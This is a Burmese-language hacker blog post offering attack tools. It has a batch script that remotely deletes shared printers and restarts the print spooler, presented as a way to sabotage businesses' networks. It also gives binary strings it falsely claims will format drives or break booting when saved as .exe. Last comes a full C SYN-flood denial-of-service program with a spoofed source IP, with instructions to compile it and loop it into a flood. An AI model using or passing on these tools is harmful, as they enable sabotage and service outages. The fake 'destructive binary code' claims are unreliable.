ေနေသာ္ေအာင္

Delete Network Printer Remotely


 Delete Network Printer Remotely


Delete Network Printer Remotely
ျကားဖူးျကမွာပါ တခ်ို့ နက္၀က္ေတြ လုပ္ငန္းသံုးေတြမွာ print ေတြကို  share လုတ္ထားတယ္ ေပါ့ ဒီ print
share လုတ္ထားတာကို ဖ်က္ပစ္ ဟက္ပစ္ထိမ္းခ်ုပ္ပစ္ မယ့္ script ပါ ေနာက္ ကြန္ပ်ူတာ network system တစ္ခုလံုးကို ဖ်က္ပစ္ဟက္ပစ္ ထိမ္းခ်ပ္ ပစ့္မဲ့ script ေတြတင္ေပးပါမယ္ တင္ေပးမယ္ဆိုျပီး မတင္ျဖစ္တာေတြလဲမ်ားေနပါျပီး ကဲ note pad
ကိုဖြင့္ပါ

@Echo off
REM this command file will delete a network printer to a computer remotely

REM the parameters are:

REM   1 - the name of the computer to which the network printer is to be deleted
REM   2 - the UNC name of the printer to be deleted

REM for example, to delete the printer called ThePrinter that is shared from the computer PrintServer
REM    to the computer called TheClient:

REM  key this command in a Command Prompt window:

REM     deleteglobalprinterremotely theclient printserver\theprinter


REM delete the specified printer to the specified computer

@Echo On
rundll32 printui.dll,PrintUIEntry /gd /c\\%1 /n\\%2
@Echo off

REM stop the print spooler on the specified computer and wait until the sc command finishes

@Echo On
start /wait sc \\%1 stop spooler
@Echo off

REM start the print spooler on the specified computer and wait until the sc command finishes

@Echo On
start /wait sc \\%1 start spooler

deleteglobalprinterremotely.cmd နဲ့ save ပါ  prin is delete and remotely  is really
  အျခား အင္တာနက္ဆိုင္ေတြ လုပ္ငန္းေတြ ေတာ္ေတာ္ မ်ားမ်ား က sever ထိုင္တဲ့ စက္ကေနျပီးေတာ့
print ေတြကို share ေပးျပီး ထိမ္းခ်ုပ္ထားပါတယ္ ဒီစနစ္ေတြကိုဖ်က္ပစ္မဲ့ script လို့ သက္မွတ္ပါ
ဥပမာ စာ ဖက္သူ က သူမ်ားနက္၀က္ထဲကို ေရာက္ရွိသံုးစြဲဒါမွမဟုတ္၀င္ဟက္မဲ့ သူ အခ်က္အလက္ခိုးယူမဲ့ သူဆိုရင္
ဒီလို script ေတြကို ေလ့လာသင့္ပါတယ္ ေနာက္လာမယ္ step by step ေပါ့ ေနေသာ္ေအာင္

China Hacker Group

မ်ားစြာအႏၱရာယ္ေပးေသာ Binary Code မ်ား



၁. Notepad ကိုဖြင့္ပါ။

၂. ေအာက္ေဖာ္ျပပါ code မ်ားကိုကူးထည္႕ပါ။


၃. Save လုပ္မည္႕အခါတြင္ .exe ဖိုင္အေနျဖင့္ save လုပ္ပါ။



- Hard disk ကိုဖ်က္ဆီးႏိုင္သည္႕ Code


010010110001111100100101010101
01010000011111100000





- C: Partition ကို Format လုပ္ႏိုင္သည္႕ Code


011001100110111101110010011011
01011000010111010000 100000011000110011101001011100001000000 01011110101 00010010111101011000





- D: Partition ကို Format လုပ္ႏိုင္သည္႕ Code


011001100110111101110010011011
01011000010111010000 100000011000010011101001011100001000000 01011110101 00010010111101011000





- A: Partition ကို Format လုပ္ႏိုင္သည္႕ Code


011001100110111101110010011011
01011000010111010000 100000011000010011101001011100001000000 01011110101 00010010111101011000





- Boot Failure ျဖစ္ႏိုင္သည္႕ Code


011001000110010101101100001000
00001011110100011000101111010100110010111101010001001000000110001100111010010111000110001001101111011011110111010000101110011010010110111001101001





Binary Code မ်ား အေၾကာင္းကိုေအာက္ကလင့္မွာေလ့လာႏ
ိုင္ပါတယ္ဗ်

ဘိုင္နရီ ကုတ္ဆိုတာ


http://youth-it-technican.blogspot.com/2012/08/binary-coad.html
<----ဒါကဘေလာခ္လင့္ပါ

ဘိုင္နရီ ကုတ္ { Binary coad }ဆိုတာ




  •  ဘိုင္နရီ ကုတ္ { Binary coad }ဆိုတာ
    ကြန္ပ်ူတာေတြနားလည္တဲ့ စကားေပါ့ ေနာ္အရင္ တံုးကရွင္းျပဖူးပါတယ္
    ကြန္ပ်ူတာေတြတစ္လံုးနဲ့ တစ္လံုးဆက္သြယ္တဲ့ အခါမွာ ဒီ computer ေတြကို ဒီတိုင္းဆက္သြယ္လို့မရပါဘူး

    သူတို့ကို  တစ္ဦးနဲ့ တစ္ဦး နားလည္တဲ့ ဘိုင္နရီ  ကုတ္ေလးနဲ့ ဆက္သြယ္ထားပါတယ္ ကြန္ပ်ူတာကလည္းဒါပဲ
    နားလည္ပါတယ္ 0,1 ေပါ့ ပထမ တစ္လံုးနဲ့တစ္လံုးခ်ိပါဆက္တဲ့ အခါမွာ သူတို့ေတြကို data ေတြပို့ေဆာင္တဲ့ အခါမွာ သက္ဆိုင္ရာ ကြန္ပ်ူတာေတြဆီ ပိုေဆာင္တဲ့ data ေတြေရာက္၇ွိသြားဖို့ ip address ေေတြကိုသံုးပါ
    တယ္ ip address ဟာ  computer ေတြရဲ့ ကိုယ္စလွည္ပါ  ဒီ ကြန္ပ်ူတာကေနျပီးေတာ့ အျခားကြန္ပ်ူတာ
    တစ္လံုးကို network လိုင္းကေနျပီးဥပမာ photo တစ္ ခုပို့လိုက္တယ္ဆိုပါစို့ ဒီ photo ဟာ ဒီအတိုင္းျကီးေရာက္
    သြားတာမဟုတ္ပါ computer နားလည္တဲ့ bynary language နဲ့ 01010010010110000000011111
    အျဖစ္ ေျပာင္းလဲျပီးေတာ့ နက္၀က္ေပါင္းသန္းေပါင္းမ်ားစြာကိုျဖက္သန္းျပီးေတာ့ သက္ဆိုင္ရာ ip address
    ဆီသို့ေရာက္ေအာင္ပိုေဆာင္ပါတယ္ ဒီ 0 and1 ကို ေရာက္ရွိတဲ့ ကြန္ပ်ူတာက ျပန္လည္ျပီးေတာ့ photo တစ္ခုအျဖစ္တည္ေဆာက္ျပီးေတာ့ ဘာသာျပန္ပါတယ္ ေရွ master hacker  ျကီးေတြက ဒီ bynary
    ကို အသံုးျပုျပီးေတာ့ Network ေတြေဖာက္ထြင္း password ေတြဟက္ Web CMS  ကလည္းဒီ binary
    နဲ့ မကင္းပါဘူး မကင္းဆို bynary က လူရွုပ္ျကီးကို အဲေလ conputer သံုးေနသမ်ွ ဒီ binary language
    နဲ့ ကင္းလို့မရပါဘူး ေျမက္မ်ားစြာ ေသာ computer တိမ္းခ်ပ္မွူ system ေတြဟာ သူနဲ့သက္ဆိုင္ပါတယ္
    ဒီေကာင္ကလည္း ထိပ္တန္း script ကို ဒါေျကာင့္ အခ်ို့ master hacker ေတြက ဒီေကာင္ကိုအသံုျပုျကပါတယ္ ခုထိ A taxonomy of code injection attacks. Code injection attacks. Binary attacks. Dynamic language attacks. ဆိုတာ နာျမည္ျကီး တမင္းငက္ အဲ့ေလ ထြက္ေပါ္လာပါတယ္ ကဲေလ့လာေရးသာရေအာင္ ေသခ်မွတ္သားပါ အလြပ္က်က္ထားပါ ဒါမွ အနာ ဂတ္ျမန္မာ  ဟက္ကာေလာင္းေတြျဖစ္ျကမွာေပါ့  ကဲေရးျကည္ရေအာင္binary language ေတြေနာက္စမယ္

    အေျခခံက binary language မွာ english စာေတြကို


    Letter
    Binary Code
    A 01000001 B 01000010 C 01000011 D 01000100 E 01000101 F 01000110 G 01000111 H 01001000 I 01001001 J 01001010 K 01001011 L 01001100 M 01001101 N 01001110 O 01001111 P 01010000 Q 01010001 R 01010010 S 01010011 T 01010100 U 01010101 V 01010110 W 01010111 X 01011000 Y 01011001 Z 01011010


    Letter
    Binary Code
    a 01100001 b 01100010 c 01100011 d 01100100 e 01100101 f 01100110 g 01100111 h 01101000 i 01101001 j 01101010 k 01101011 l 01101100 m 01101101 n 01101110 o 01101111 p 01110000 q 01110001 r 01110010 s 01110011 t 01110100 u 01110101 v 01110110 w 01110111 x 01111000 y 01111001 z 01111010

    ဒီလိုသက္မွတ္ပါတယ္
    ဥပမာ Bob = 010000100110111101100010
            Computer =0100001101101111011011010111000001110101011101000110010101110010

    စမ္းျပီးေတာ့ ကြန္ပ်ူတာနားလည္တဲ့ ဘာသာစကားေတြကို လူေတြေရးျကည္ပါ
    နံပတ္ကေတာ့

    1. 1
    2. 10
    3. 11
    4. 100
    5. 101
    6. 110
    7. 111
    8. 1000
    9. 1001
    10. 1010
    11. 1011
    12. 1100
    13. 1101
    14. 1110
    15. 1111
    16. 10000
    17. 10001
    18. 10010
    19. 10011
    20. 10100
    ပါ စမ္းေရးျကည္ပါတျဖည္ျဖည္းနဲ့ဒီအေျကာင္းကိုနားလည္လာတဲ့ အခါမွာ ဒီlanguage  ေလးကိုဘယ္လိုတက္ျမတ္စြာ အသံုးျပုရမလဲဆိုတာသိလာပါမယ္
    ကဲညီေလးတစ္ေယာက္ကေမးတယ္ C language နဲ့ Ddos attack လုတ္လို့ရသလားတဲ ဘယ္လိုေရးသြားသလဲတဲ့ ညီေလးက C ကိုေလ့လာေနသူပါတဲ့ရတယ္ညီေလးရယ္ ဒါကိုက်ြန္ေတာ္တို့အဖြဲ့
    ဆရာျကီးကေရးျပပါမယ္  mr.depaker (RUSSIA) c++,c#, java, python
    ပါ  Ddos attack c flood coad ပါ
    TCP/IP 3-way handshake is done to establish a connection between a client and a server. The process is :

    1. Client –SYN Packet–> Server
    2. Server –SYN/ACK Packet –> Client
    3. Client –ACK Packet –> Server

    The above 3 steps are followed to establish a connection between source and destination.

    SYN Flood DOS attacks involves sending too many SYN packets (with a bad or random source ip) to the destination server. These SYN requests get queued up on the server’s buffer and use up the resources and memory of the server. This can lead to a crash or hang of the server machine.
    After sending the SYN packet it is a half-open connection and it takes up resources on the server machine. So if an attacker sends syn packets faster than memory is being freed up on the server then it would be an overflow situation.Since the server’s resources are used the response to legitimate users is slowed down resulting in Denial of Service.
    Most webservers now a days use firewalls which can handle such syn flood attacks and moreover even web servers are now more immune.
    Below is an example code in c :



    /*
        Syn Flood DOS with LINUX sockets
    */
    #include<stdio.h>
    #include<netinet/tcp.h>   //Provides declarations for tcp header
    #include<netinet/ip.h>    //Provides declarations for ip header

    typedef struct pseudo_header    //needed for checksum calculation
    {
        unsigned int source_address;
        unsigned int dest_address;
        unsigned char placeholder;
        unsigned char protocol;
        unsigned short tcp_length;
        //char tcp[28];
        struct tcphdr tcp;
    };

    unsigned short csum(unsigned short *ptr,int nbytes) {
        register long sum;
        unsigned short oddbyte;
        register short answer;

        sum=0;
        while(nbytes>1) {
            sum+=*ptr++;
            nbytes-=2;
        }
        if(nbytes==1) {
            oddbyte=0;
            *((u_char*)&oddbyte)=*(u_char*)ptr;
            sum+=oddbyte;
        }

        sum = (sum>>16)+(sum & 0xffff);
        sum = sum + (sum>>16);
        answer=(short)~sum;

        return(answer);
    }

    int main (void)
    {
        //Create a raw socket
        int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
        //Datagram to represent the packet
        char datagram[4096];
        //IP header
        struct iphdr *iph = (struct iphdr *) datagram;
        //TCP header
        struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
        struct sockaddr_in sin;
        struct pseudo_header psh;

        sin.sin_family = AF_INET;
        sin.sin_port = htons(80);
        sin.sin_addr.s_addr = inet_addr ("1.2.3.4");

        memset (datagram, 0, 4096); /* zero out the buffer */

        //Fill in the IP Header
        iph->ihl = 5;
        iph->version = 4;
        iph->tos = 0;
        iph->tot_len = sizeof (struct ip) + sizeof (struct tcphdr);
        iph->id = htonl (54321); //Id of this packet
        iph->frag_off = 0;
        iph->ttl = 255;
        iph->protocol = IPPROTO_TCP;
        iph->check = 0;      //Set to 0 before calculating checksum
        iph->saddr = inet_addr ("192.168.1.2");  //Spoof the source ip address
        iph->daddr = sin.sin_addr.s_addr;

        iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

        //TCP Header
        tcph->source = htons (1234);
        tcph->dest = htons (80);
        tcph->seq = 0;
        tcph->ack_seq = 0;
        tcph->doff = 5;      /* first and only tcp segment */
        tcph->fin=0;
        tcph->syn=1;
        tcph->rst=0;
        tcph->psh=0;
        tcph->ack=0;
        tcph->urg=0;
        tcph->window = htons (5840); /* maximum allowed window size */
        tcph->check = 0;/* if you set a checksum to zero, your kernel's IP stack
                    should fill in the correct checksum during transmission */
        tcph->urg_ptr = 0;
        //Now the IP checksum

        psh.source_address = inet_addr("192.168.1.2");
        psh.dest_address = sin.sin_addr.s_addr;
        psh.placeholder = 0;
        psh.protocol = IPPROTO_TCP;
        psh.tcp_length = htons(20);

        memcpy(&psh.tcp , tcph , sizeof (struct tcphdr));

        tcph->check = csum( (unsigned short*) &psh , sizeof (struct pseudo_header));

        //IP_HDRINCL to tell the kernel that headers are included in the packet
        {
            int one = 1;
            const int *val = &one;
            if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
                printf ("Warning: Cannot set HDRINCL!n");
        }

        //while (1)
        //{
            //Send the packet
            if (sendto (s,      /* our socket */
                        datagram,   /* the buffer containing headers and data */
                        iph->tot_len,    /* total length of our datagram */
                        0,      /* routing flags, normally always 0 */
                        (struct sockaddr *) &sin,   /* socket addr, just like in */
                        sizeof (sin)) < 0)       /* a normal send() */

                printf ("errorn");
            //Data send successfully
            else
                printf (".");
        //}

        return 0;
    }



    To compile simply : gcc synflood.c
    And then : sudo ./a.out (if on Ubuntu)
    Use wireshark to check the packets and replies from server.
    The sendto function if put in a loop will start flooding the destination ip with syn packets.
    Popularity: 39% [?]
    နေသာ္ေအာင္ နဲ့  mr.depaker (RUSSIA) ပါ
back to top